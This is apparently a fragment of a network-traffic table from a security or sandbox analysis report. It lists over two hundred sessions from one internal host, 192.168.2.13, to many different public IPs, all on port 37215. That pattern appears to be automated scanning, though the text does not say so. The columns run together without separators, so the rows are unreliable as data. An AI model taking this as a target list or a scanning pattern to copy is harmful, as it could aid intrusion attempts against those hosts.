                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14945192.168.2.1333606157.70.51.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14946192.168.2.133632235.121.135.19537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14947192.168.2.1355808157.251.237.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14948192.168.2.135309041.236.215.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14949192.168.2.135355641.37.20.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14950192.168.2.134451041.48.47.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14951192.168.2.135962086.35.97.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14952192.168.2.135384041.255.234.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14953192.168.2.135709641.184.10.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14954192.168.2.1348038197.140.30.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14955192.168.2.133343841.74.222.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14956192.168.2.1346970157.2.169.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14957192.168.2.1333422157.131.206.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14958192.168.2.1350712197.215.70.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14959192.168.2.134192641.240.73.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14960192.168.2.133750041.135.124.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14961192.168.2.1354928119.39.77.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14962192.168.2.1335764168.212.248.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14963192.168.2.1360622202.169.169.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14964192.168.2.1338140118.106.174.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14965192.168.2.1352062197.138.224.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14966192.168.2.1344688157.52.18.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14967192.168.2.134164023.26.152.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14968192.168.2.135613041.19.223.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14969192.168.2.1353264197.64.247.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14970192.168.2.1353564197.188.166.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14971192.168.2.1343490157.150.159.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14972192.168.2.1356586157.22.99.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14973192.168.2.1356606197.144.249.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14974192.168.2.134563295.220.241.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14975192.168.2.1360490157.117.228.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14976192.168.2.1335146197.39.215.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14977192.168.2.1345114157.161.182.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14978192.168.2.133569441.26.16.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14979192.168.2.135057241.170.161.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14980192.168.2.135518091.254.187.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14981192.168.2.134161246.29.221.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14982192.168.2.1346842160.93.86.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14983192.168.2.1357580167.18.131.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14984192.168.2.135795041.73.198.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14985192.168.2.1333116157.158.35.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14986192.168.2.1338886222.113.124.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14987192.168.2.1354328157.21.211.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14988192.168.2.1339794197.171.101.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14989192.168.2.1358738157.46.112.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14990192.168.2.1345810211.245.37.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14991192.168.2.1336056174.166.142.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14992192.168.2.133376641.94.24.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14993192.168.2.1348806197.60.44.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14994192.168.2.133992490.67.90.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14995192.168.2.1336528197.104.66.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14996192.168.2.1337530205.189.165.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14997192.168.2.1340620157.118.107.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14998192.168.2.134913641.132.61.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14999192.168.2.1347618183.25.6.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15000192.168.2.135163251.10.201.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15001192.168.2.135194447.216.167.21237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15002192.168.2.134326441.142.180.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15003192.168.2.1345990197.194.235.8737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15004192.168.2.134913241.52.239.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15005192.168.2.134870641.251.230.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15006192.168.2.134639041.246.72.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15007192.168.2.1337654197.243.18.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15008192.168.2.1341394135.90.49.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15009192.168.2.1346326157.66.229.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15010192.168.2.1342986161.98.65.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15011192.168.2.1360388157.131.0.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15012192.168.2.135477491.70.43.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15013192.168.2.1338494197.247.73.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15014192.168.2.1349380197.183.101.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15015192.168.2.134188641.139.89.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15016192.168.2.134732641.173.67.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15017192.168.2.135932641.191.219.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15018192.168.2.134514683.77.28.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15019192.168.2.1334440197.196.67.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15020192.168.2.1359058212.78.98.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15021192.168.2.1345450197.99.54.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15022192.168.2.1344368197.170.5.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15023192.168.2.1346578154.74.64.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15024192.168.2.1360592157.217.19.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15025192.168.2.1333944157.224.78.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15026192.168.2.134207279.183.11.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15027192.168.2.1333710197.27.25.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15028192.168.2.133623241.208.81.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15029192.168.2.1340010157.13.100.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15030192.168.2.1356594197.174.248.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15031192.168.2.1349548197.42.210.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15032192.168.2.133808046.213.227.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15033192.168.2.1333980197.166.4.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15034192.168.2.1345050197.214.127.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15035192.168.2.1339054197.162.153.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15036192.168.2.135571441.223.104.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15037192.168.2.1350622197.70.208.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15038192.168.2.1345228157.151.132.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15039192.168.2.134401441.201.94.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15040192.168.2.1356702197.70.173.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15041192.168.2.1356324152.224.195.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15042192.168.2.1333350197.18.46.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15043192.168.2.133967441.220.169.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15044192.168.2.1350392157.202.234.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15045192.168.2.1358230157.80.134.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15046192.168.2.1355744197.89.144.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15047192.168.2.134984441.146.232.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15048192.168.2.136079041.14.25.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15049192.168.2.1345844157.228.95.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15050192.168.2.1345646197.192.131.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15051192.168.2.1344112190.181.104.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15052192.168.2.1334404135.34.61.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15053192.168.2.1338596157.194.82.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15054192.168.2.1348648157.217.11.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15055192.168.2.1340476157.201.171.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15056192.168.2.134880841.89.203.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15057192.168.2.133919835.167.250.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15058192.168.2.1347332197.6.102.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15059192.168.2.1348604110.13.98.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15060192.168.2.1350870197.228.48.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15061192.168.2.1354952157.103.155.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15062192.168.2.1335000197.247.238.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15063192.168.2.1346902157.238.177.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15064192.168.2.1339828160.21.42.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15065192.168.2.1351288157.84.6.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15066192.168.2.1342078197.241.144.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15067192.168.2.1336462208.65.27.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15068192.168.2.1348256197.41.179.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15069192.168.2.1336860197.120.242.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15070192.168.2.134549241.139.39.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15071192.168.2.1360632197.247.60.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15072192.168.2.1358568157.154.211.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15073192.168.2.1355768197.228.109.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15074192.168.2.134321418.14.92.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15075192.168.2.1355582197.211.99.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15076192.168.2.1353226157.62.82.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15077192.168.2.134884254.35.27.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15078192.168.2.134765841.188.190.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15079192.168.2.1337588197.83.205.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15080192.168.2.1358344157.150.46.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15081192.168.2.1350462197.33.159.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15082192.168.2.134134299.235.168.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15083192.168.2.1350414157.147.142.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15084192.168.2.136047241.177.207.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15085192.168.2.1353442157.3.211.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15086192.168.2.136000641.253.135.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15087192.168.2.1338112197.118.209.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15088192.168.2.134107472.24.195.13137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15089192.168.2.134620286.13.255.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15090192.168.2.1350228157.16.198.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15091192.168.2.1360930157.31.8.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15092192.168.2.1345834157.158.221.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15093192.168.2.134260680.51.152.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15094192.168.2.1357144157.112.49.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15095192.168.2.135382041.128.5.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15096192.168.2.1338106157.24.246.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15097192.168.2.1353832209.47.166.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15098192.168.2.134108451.130.138.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15099192.168.2.1350870197.107.30.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15100192.168.2.135947041.162.163.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15101192.168.2.134204832.80.229.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15102192.168.2.1354158197.69.2.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15103192.168.2.136087641.34.118.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15104192.168.2.1335898157.104.186.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15105192.168.2.135068041.184.42.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15106192.168.2.1359452157.26.8.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15107192.168.2.1348720197.150.3.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15108192.168.2.1356240197.220.186.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15109192.168.2.134381041.176.144.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15110192.168.2.13609005.82.154.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15111192.168.2.134057441.40.123.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15112192.168.2.133912641.36.220.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15113192.168.2.1349374157.70.189.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15114192.168.2.1360784197.220.202.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15115192.168.2.13351889.124.102.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15116192.168.2.135531441.96.230.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15117192.168.2.1340422157.80.15.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15118192.168.2.134716241.180.139.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15119192.168.2.1349646197.79.51.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15120192.168.2.134384841.232.223.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15121192.168.2.1345832157.184.48.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15122192.168.2.1350978197.82.19.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15123192.168.2.1356800107.140.98.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15124192.168.2.135990241.228.157.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15125192.168.2.135948241.179.137.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15126192.168.2.1358594157.158.147.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15127192.168.2.1351278197.144.47.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15128192.168.2.134040641.144.91.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15129192.168.2.1334786197.28.51.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15130192.168.2.1352640134.159.84.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15131192.168.2.1334490197.202.126.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15132192.168.2.134538041.75.43.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15133192.168.2.1334866197.189.182.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15134192.168.2.1359436197.48.62.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15135192.168.2.1345572197.135.148.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15136192.168.2.1360436202.129.239.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15137192.168.2.1351414197.169.78.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15138192.168.2.135715641.249.117.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15139192.168.2.1360516197.43.164.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15140192.168.2.134978841.97.98.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15141192.168.2.1347106197.79.194.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15142192.168.2.135024284.72.23.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15143192.168.2.134370041.173.172.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15144192.168.2.1357808197.100.7.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15145192.168.2.1356880211.30.67.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15146192.168.2.1345770197.195.138.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15147192.168.2.1345684212.250.127.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15148192.168.2.134355841.59.142.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15149192.168.2.133777841.135.129.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15150192.168.2.1342232170.1.246.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15151192.168.2.1345636157.21.166.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15152192.168.2.1344962197.9.90.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15153192.168.2.1348970157.24.71.537215
                                                  TimestampBytes transferredDirectionData


